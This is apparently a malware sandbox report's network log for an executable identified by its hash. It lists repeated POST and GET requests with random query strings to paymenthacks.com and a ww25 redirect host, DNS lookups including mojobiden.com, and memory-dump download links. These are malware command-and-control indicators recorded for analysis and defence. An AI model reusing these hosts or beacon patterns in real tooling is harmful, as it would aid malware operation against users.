    POST http://paymenthacks.com/?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94

    HTTP Response

    302
  • 199.59.242.153:80
    http://ww25.paymenthacks.com/?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94&subid1=20211123-2206-3558-8060-76b2b34a1a3f
    http
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    996 B
     2.7kB
     7
    4

    HTTP Request

    GET http://ww25.paymenthacks.com/?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94&subid1=20211123-2206-3558-8060-76b2b34a1a3f

    HTTP Response

    200
  • 103.224.212.222:443
    https://paymenthacks.com/?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p
    tls, http
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    2.1kB
     934 B
     12
    7

    HTTP Request

    POST https://paymenthacks.com/?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p

    HTTP Response

    302
  • 199.59.242.153:80
    http://ww25.paymenthacks.com/?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p&subid1=20211123-2206-3893-a9aa-932565da47dd
    http
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    844 B
     2.4kB
     7
    4

    HTTP Request

    GET http://ww25.paymenthacks.com/?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p&subid1=20211123-2206-3893-a9aa-932565da47dd

    HTTP Response

    200
  • 103.224.212.222:80
    http://paymenthacks.com/?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p
    http
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    1.4kB
     637 B
     6
    4

    HTTP Request

    POST http://paymenthacks.com/?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p

    HTTP Response

    302
  • 199.59.242.153:80
    http://ww25.paymenthacks.com/?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p&subid1=20211123-2206-3877-b811-d79b46f7f999
    http
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    890 B
     2.4kB
     8
    5

    HTTP Request

    GET http://ww25.paymenthacks.com/?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p&subid1=20211123-2206-3877-b811-d79b46f7f999

    HTTP Response

    200
  • 8.8.8.8:53
    paymenthacks.com
    dns
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    62 B
     78 B
     1
    1

    DNS Request

    paymenthacks.com

    DNS Response

    103.224.212.222

  • 8.8.8.8:53
    ww25.paymenthacks.com
    dns
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    67 B
     109 B
     1
    1

    DNS Request

    ww25.paymenthacks.com

    DNS Response

    199.59.242.153

  • 8.8.8.8:53
    mojobiden.com
    dns
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    59 B
     132 B
     1
    1

    DNS Request

    mojobiden.com

  • 8.8.8.8:53
    time.windows.com
    dns
    62 B
     114 B
     1
    1

    DNS Request

    time.windows.com

    DNS Response

    20.101.57.9

  • 20.101.57.9:123
    time.windows.com
    ntp
    76 B
     1

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2632-118-0x0000000000DC3000-0x0000000000DC5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2632-119-0x0000000000DC0000-0x0000000000DC1000-memory.dmp

    Filesize

    4KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.